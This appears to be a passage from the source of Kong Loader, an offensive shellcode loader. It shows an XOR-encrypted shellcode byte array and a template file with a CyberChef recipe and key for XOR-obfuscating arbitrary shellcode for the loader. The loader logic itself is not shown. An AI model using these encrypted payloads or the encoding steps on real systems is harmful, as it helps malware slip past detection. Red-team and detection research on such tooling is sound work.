41 | 0x21,0x01,0xec,0xe3,0x40,0x1c,0x49,0x17,0x84,0x55,0x88,0x8d,
42 | 0x21,0x75,0x44,0xe2,0x40,0x1a,0xe7,0x70,0x05,0xe2,0x70,0x0c,
43 | 0x06,0x00,0x0d,0x63,0x4c,0x8d,0xab,0x80,0xf4,0x4a,0x34,0x3d,
44 | 0xe6,0x42,0x80,0x8e,0x49,0x89,0x93,0x90,0xb9,0x72,0x19,0x88,
45 | 0x21,0x01,0xe8,0xe3,0x40,0x1c,0xcc,0x00,0x47,0xa6,0x09,0x88,
46 | 0x21,0x01,0xd0,0xe3,0x40,0x1c,0xeb,0xca,0xc8,0x22,0x09,0xcd,
47 | 0x7a,0x00,0x94,0xeb,0x19,0x92,0xf3,0x1b,0x8d,0xf2,0x00,0x95,
48 | 0xeb,0x1b,0x84,0x29,0xad,0xec,0xeb,0x13,0x33,0x4a,0x19,0x8d,
49 | 0xf3,0x1b,0x84,0x21,0x53,0x25,0xfd,0xbe,0x33,0x55,0x1c,0x84,
50 | 0x10,0x40,0xcc,0xaa,0x41,0xcc,0xaa,0x41,0xcc,0xe2,0xcc,0x41,
51 | 0xab,0x40,0xcc,0xaa,0x00,0x76,0x9b,0xca,0xa3,0x2d,0xbe,0x19,
52 | 0x11,0xeb,0x09,0x48,0x1c,0x8d,0x10,0xe7,0x59,0x17,0xdc,0x33,
53 | 0x7f,0x09,0x4f,0x6e,0x69,0xf0,0xac,0x3d,0xc6,0x2a,0xba,0x2c,
54 | 0xdf,0x44,0x77,0xed,0x52,0xbe,0xc5,0x2b,0xcc,0xf3,0x00,0x45,
55 | 0x70,0xbe,0x19,0xc9,0x20,0xa0,0xc9,0x6f,0xa9,0xd2,0x24,0xcc
56 | };
--------------------------------------------------------------------------------
/src/shellcode/Your-Shellcode.c:
--------------------------------------------------------------------------------
1 | /**
2 | * Mozilla Public License (MPL) Version 2.0.
3 | *
4 | * Copyright (c) 2024 Tijme Gommers (@tijme).
5 | *
6 | * This source code file is part of Kong Loader. Kong Loader is
7 | * licensed under Mozilla Public License (MPL) Version 2.0, and
8 | * you are free to use, modify, and distribute this file under
9 | * its terms. However, any modified versions of this file must
10 | * include this same license and copyright notice.
11 | */
12 |
13 | /**
14 | *
15 | * ██████╗██╗ ██╗██████╗ ███████╗██████╗ ██████╗██╗ ██╗███████╗███████╗
16 | * ██╔════╝╚██╗ ██╔╝██╔══██╗██╔════╝██╔══██╗██╔════╝██║ ██║██╔════╝██╔════╝
17 | * ██║ ╚████╔╝ ██████╔╝█████╗ ██████╔╝██║ ███████║█████╗ █████╗
18 | * ██║ ╚██╔╝ ██╔══██╗██╔══╝ ██╔══██╗██║ ██╔══██║██╔══╝ ██╔══╝
19 | * ╚██████╗ ██║ ██████╔╝███████╗██║ ██║╚██████╗██║ ██║███████╗██║
20 | * ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝
21 | *
22 | * Use this CyberChef command to XOR your shellcode and convert it to the format for this file (adjust XOR key if desired):
23 | * https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','0x%5C%5Cw%7B2%7D',true,true,false,false,false,false,'List%20matches')Find_/_Replace(%7B'option':'Regex','string':'(.*)%5C%5Cn'%7D,'$1,',true,false,true,false)Remove_whitespace(true,true,true,true,true,false)From_Hex('Auto')XOR(%7B'option':'Hex','string':'AA41CC'%7D,'Standard',false)To_Hex('0x%20with%20comma',15)Find_/_Replace(%7B'option':'Regex','string':'((0x(%5C%5Cd%7C%5C%5Cw)%7B2%7D,?%5C%5Cn?)%2B)'%7D,'%23define%20STATIC_SHELLCODE_NAME%20%22Your-Shellcode%22%20//%20Name%20to%20be%20printed%20%5C%5Cn%23define%20STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED%200x1%20//%20May%20only%20be%20negative%20for%20debugging%20purposes%20with%20plain%20static%20shellcode%20%5C%5Cn%23define%20STATIC_SHELLCODE_HAS_RETURN_VALUE%200x0%20//%20Print%20return%20value%20of%20the%20shellcode%20to%20the%20console%5C%5Cn%5C%5Cnstatic%20uint8_t%20StaticPassword%5B%5D%20%3D%20%7B%200xAA,%200x41,%200xCC%20%7D;%5C%5Cn%5C%5Cnstatic%20uint8_t%20StaticShellcode%5B%5D%20%3D%20%7B%5C%5Cn$1%5C%5Cn%7D;',true,false,true,true)Find_/_Replace(%7B'option':'Regex','string':'%5E0x'%7D,'%20%20%20%200x',true,false,true,false)&input=Ly8gVXNlIHRoZSBjb21tYW5kIGJlbG93IHRvIGdldCB0aGUgaW5wdXQgZm9yIHRoaXMgWE9SIGVuY29kaW5nIGJha2Ugd2l0aCBDeWJlckNoZWYKLy8geHhkIC1pIHlvdXItc2hlbGxjb2RlLmJpbgoKdW5zaWduZWQgY2hhciBfX195b3VyX3NoZWxsY29kZV9iaW5bXSA9IHsKICAweDU1LCAweDQ4LCAweDg5LCAweGU1LCAweGU4LCAweDhiLCAweDk3LCAweDAwLCAweDAwLCAweDkwLCAweDVkLCAweGMzLAogIDB4NTUsIDB4NDgsIDB4ODksIDB4ZTUsIDB4NDgsIDB4ODMsIDB4ZWMsIDB4MTAsIDB4YzcsIDB4NDUsIDB4ZmMsIDB4NjAsCiAgMHgwMCwgMHgwMCwgMHgwMCwgMHg4YiwgMHg0NSwgMHhmYywgMHg2NSwgMHg0OCwgMHg4YiwgMHgwMCwgMHg0OCwgMHg4OSwKICAweDQ1LCAweGYwLCAweDQ4LCAweDhiLCAweDQ1LCAweGYwLCAweGM5LCAweGMzLCAweDU1LCAweDQ4LCAweDg5LCAweGU1LAogIDB4NDgsIDB4ODksIDB4NGQsIDB4MTAsIDB4NDgsIDB4OGIsIDB4NDUsIDB4MTAsIDB4NDgsIDB4ODMsIDB4ZTgsIDB4MTAsCiAgMHg1ZCwgMHhjMywgMHg1NSwgMHg0OCwgMHg4OSwgMHhlNSwgMHg0OCwgMHg4OSwgMHg0ZCwgMHgxMCwgMHg0OCwgMHg4OQogIC4uLgp9Ow
24 | */
25 |
26 | /**
27 | * Predefined definitions
28 | */
29 | #define STATIC_SHELLCODE_NAME "Your-Shellcode" // Name to be printed
30 | #define STATIC_SHELLCODE_IS_ALREADY_ENCRYPTED 0x1 // May only be negative for debugging purposes with plain static shellcode
31 | #define STATIC_SHELLCODE_HAS_RETURN_VALUE 0x0 // Print return value of the shellcode to the console
32 |
33 | /**
34 | * The XOR password to use.
35 | */
36 | static uint8_t StaticPassword[] = { 0xAA, 0x41, 0xCC };
37 |
38 | /**
39 | * The shellcode to use.
40 | */
41 | static uint8_t StaticShellcode[] = {
42 | // Replace with your shellcode
43 | 0xe2,0xcc,0xc9,0xa7,0x41,0xcc,0xaa,0x4e,0x47,0xaa,0x09,0x41,0xb7,0x49,0xcc,
44 | 0xaa,0x41,0xc5,0xa5,0xee,0xcf,0x69,0x43,0xcc,0xaa,0x41,0xcf,0xaa,0x41,0xcc
45 | };
--------------------------------------------------------------------------------